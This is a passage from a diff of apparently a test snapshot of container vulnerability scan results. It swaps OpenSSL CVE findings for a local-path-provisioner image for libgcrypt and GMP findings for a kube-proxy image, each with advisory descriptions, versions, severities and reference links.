"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33560", "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.tenable.com/security/tns-2022-06", - "https://www.tenable.com/security/tns-2022-07", - "https://www.tenable.com/security/tns-2022-08", - "https://www.tenable.com/security/tns-2022-09", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", + "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0778", + "value": "https://avd.aquasec.com/nvd/cve-2021-33560", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "https://access.redhat.com/security/cve/CVE-2021-33560", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "https://dev.gnupg.org/T5305", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5326", + "value": "https://dev.gnupg.org/T5328", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0778", + "value": "https://dev.gnupg.org/T5466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2062202", + "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4899", + "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-13627", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", + "http://www.openwall.com/lists/oss-security/2019/10/02/2", + "https://access.redhat.com/security/cve/CVE-2019-13627", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", + "https://dev.gnupg.org/T4683", + "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", + "https://linux.oracle.com/cve/CVE-2019-13627.html", + "https://linux.oracle.com/errata/ELSA-2020-4482.html", + "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", + "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", + "https://minerva.crocs.fi.muni.cz/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", + "https://security-tracker.debian.org/tracker/CVE-2019-13627", + "https://security.gentoo.org/glsa/202003-32", + "https://ubuntu.com/security/notices/USN-4236-1", + "https://ubuntu.com/security/notices/USN-4236-2", + "https://ubuntu.com/security/notices/USN-4236-3", + "https://usn.ubuntu.com/4236-1/", + "https://usn.ubuntu.com/4236-2/", + "https://usn.ubuntu.com/4236-3/", + "https://www.cve.org/CVERecord?id=CVE-2019-13627", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libgcrypt: ECDSA timing attack allowing private key leak", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "value": "https://avd.aquasec.com/nvd/cve-2019-13627", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "http://www.openwall.com/lists/oss-security/2019/10/02/2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", + "value": "https://access.redhat.com/security/cve/CVE-2019-13627", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://dev.gnupg.org/T4683", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://linux.oracle.com/cve/CVE-2019-13627.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-1", + "value": "https://linux.oracle.com/errata/ELSA-2020-4482.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-2", + "value": "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "value": "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", + "value": "https://minerva.crocs.fi.muni.cz/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220315.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-13627", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://security.gentoo.org/glsa/202003-32", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-06", + "value": "https://ubuntu.com/security/notices/USN-4236-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-07", + "value": "https://ubuntu.com/security/notices/USN-4236-2", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-08", + "value": "https://ubuntu.com/security/notices/USN-4236-3", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-09", + "value": "https://usn.ubuntu.com/4236-1/", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4236-2/", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4236-3/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-13627", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1i-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2020-1971", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": "1.8.4-5+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-40528", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "http://www.openwall.com/lists/oss-security/2021/09/14/2", - "https://access.redhat.com/security/cve/CVE-2020-1971", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", - "https://linux.oracle.com/cve/CVE-2020-1971.html", - "https://linux.oracle.com/errata/ELSA-2021-9150.html", - "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", - "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", - "https://security.gentoo.org/glsa/202012-13", - "https://security.netapp.com/advisory/ntap-20201218-0005/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://ubuntu.com/security/notices/USN-4662-1", - "https://ubuntu.com/security/notices/USN-4745-1", - "https://www.cve.org/CVERecord?id=CVE-2020-1971", - "https://www.debian.org/security/2020/dsa-4807", - "https://www.openssl.org/news/secadv/20201208.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2021.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2020-11", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "https://access.redhat.com/errata/RHSA-2022:5311", + "https://access.redhat.com/security/cve/CVE-2021-40528", + "https://bugzilla.redhat.com/2002816", + "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", + "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2022-5311.html", + "https://errata.rockylinux.org/RLSA-2022:5311", + "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", + "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", + "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", + "https://linux.oracle.com/cve/CVE-2021-40528.html", + "https://linux.oracle.com/errata/ELSA-2022-9564.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-40528", ], }, "category": "Vulnerability", - "description": "The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The ElGamal implementation in Libgcrypt before 1.9.4 allows plaintext recovery because, during interaction between two cryptographic libraries, a certain dangerous combination of the prime defined by the receiver's public key, the generator defined by the receiver's public key, and the sender's ephemeral exponents can lead to a cross-configuration attack against OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: EDIPARTYNAME NULL pointer de-reference", + "name": "ElGamal implementation allows plaintext recovery", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1971", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/14/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1971", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", + "value": "https://avd.aquasec.com/nvd/cve-2021-40528", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", + "value": "https://access.redhat.com/errata/RHSA-2022:5311", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1971.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-40528", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9150.html", + "value": "https://bugzilla.redhat.com/2002816", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", + "value": "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", + "value": "https://errata.almalinux.org/8/ALSA-2022-5311.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", + "value": "https://errata.rockylinux.org/RLSA-2022:5311", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", + "value": "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", + "value": "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202012-13", + "value": "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20201218-0005/", + "value": "https://linux.oracle.com/cve/CVE-2021-40528.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9564.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4662-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4745-1", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1971", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2020/dsa-4807", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20201208.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-40528", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-6829", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-6829", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "https://www.oracle.com/security-alerts/cpujan2020.html", + ], + }, + "category": "Vulnerability", + "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", + "references": [ { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-6829", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-6829", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2021.html", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2020-11", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23841", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": "2:6.1.2+dfsg-4+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-43618", + "installedVersion": "2:6.1.2+dfsg-4", + "packageName": "libgmp10", "references": [ - "http://seclists.org/fulldisclosure/2021/May/67", - "http://seclists.org/fulldisclosure/2021/May/68", - "http://seclists.org/fulldisclosure/2021/May/70", - "https://access.redhat.com/security/cve/CVE-2021-23841", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-84rm-qf37-fgc2", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://linux.oracle.com/cve/CVE-2021-23841.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", - "https://rustsec.org/advisories/RUSTSEC-2021-0058", - "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://support.apple.com/kb/HT212528", - "https://support.apple.com/kb/HT212529", - "https://support.apple.com/kb/HT212534", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-4745-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23841", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", + "http://seclists.org/fulldisclosure/2022/Oct/8", + "http://www.openwall.com/lists/oss-security/2022/10/13/3", + "https://access.redhat.com/security/cve/CVE-2021-43618", + "https://bugs.debian.org/994405", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", + "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", + "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", + "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", + "https://security.netapp.com/advisory/ntap-20221111-0001/", + "https://ubuntu.com/security/notices/USN-5672-1", + "https://ubuntu.com/security/notices/USN-5672-2", + "https://www.cve.org/CVERecord?id=CVE-2021-43618", ], }, "category": "Vulnerability", - "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: NULL 